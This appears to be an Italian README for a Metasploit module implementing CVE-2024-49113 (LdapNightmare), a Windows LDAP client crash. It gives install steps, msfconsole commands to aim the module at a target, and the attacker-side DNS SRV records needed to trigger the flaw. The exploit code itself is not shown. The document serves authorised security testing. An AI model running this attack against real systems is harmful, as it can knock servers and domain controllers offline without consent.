
POC di SafeBreaches per CVE-2024-49113 (LdapNightmare) integrato in Metasploit
SafeBreaches POC di CVE-2024-49113 (LdapNightmare) Integrato in Metasploit
Questo modulo implementa CVE-2024-49113, una vulnerabilità critica nel client LDAP di Windows che può causare instabilità di sistema. Il modulo si integra con Metasploit Framework, fornendo un metodo affidabile per testare la resilienza del sistema a questa vulnerabilità.
ldaptor
impacket
Installare i pacchetti Python richiesti:
pip install -r requirements.txt
Posizionare il modulo nella directory dei moduli di Metasploit:
cp ldapnightmare.py /path/to/metasploit/modules/auxiliary/dos/windows/ldap/
Assicurarsi che il modulo sia eseguibile:
chmod +x ldapnightmare.py
Avviare msfconsole:
msfconsole
Caricare e configurare il modulo:
use auxiliary/dos/windows/ldap/ldapnightmare
set RHOSTS target_ip
set RPORT 49664
set LPORT 389
set DOMAINNAME yourdomain.com
run
RHOSTS - Indirizzo del target (obbligatorio)RPORT - Porta target per RPC (default: 49664)LPORT - Porta locale per il server LDAP (default: 389)DOMAINNAME - Nome dominio dell'attaccante (obbligatorio). Questo dominio deve avere specifici record DNS SRV configurati (vedi Configurazione del Dominio)ACCOUNT - Nome dell'account target (default: Administrator)SITENAME - Nome del sito target (default: vuoto)Il parametro DOMAINNAME richiede specifici record DNS SRV. Il dominio deve avere due record SRV:
ldap.tcp.dc._msdcs.domain_name → listen_port attacker's_machine_hostnameldap.tcp.default-first-site-name._sites.dc._msdcs.domain_name → listen_port attacker's_machine_hostnameNota importante: L'hostname della macchina attaccante funzionerà solo se il server vittima riesce a risolverlo tramite NBNS. In alternativa, è possibile sostituire l'hostname con un nome di dominio che punti all'indirizzo IP del server LDAP.
Il modulo opera in tre fasi principali:
Questo modulo è destinato esclusivamente a test di sicurezza autorizzati e a scopi di ricerca. Gli utenti devono ottenere le opportune autorizzazioni prima di testare qualsiasi sistema di cui non sono proprietari o per cui non hanno il permesso di test.
Questo modulo è rilasciato sotto la licenza BSD 3-Clause.
Questo lavoro contiene codice derivato da:
I testi completi delle licenze si trovano nel file LICENSES.